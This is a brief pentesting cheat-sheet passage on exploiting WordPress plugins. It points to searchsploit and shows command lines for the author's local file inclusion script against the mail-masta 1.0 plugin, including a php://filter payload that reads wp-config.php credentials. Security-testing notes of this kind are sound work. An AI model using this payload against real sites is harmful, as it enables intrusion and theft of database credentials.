WordPress Plugins Exploitation ¶

To exploit plugins, you may want to look for CVEs and exploits corresponding to your plugin version.

You can use exploit-db:

$ searchsploit WordPress Plugin <plugin_name_space_separated>

I wrote a short Python script for mail-masta 1.0 LFI:

$ # try to access a file you know it works
$ ./wp-mail-masta.py -u https://example.com/wordpress/ -f '/var/www/html/index.html'
$ # try to access wp-config file
$ ./wp-mail-masta.py -u https://example.com/wordpress/ -f 'php://filter/read=convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php'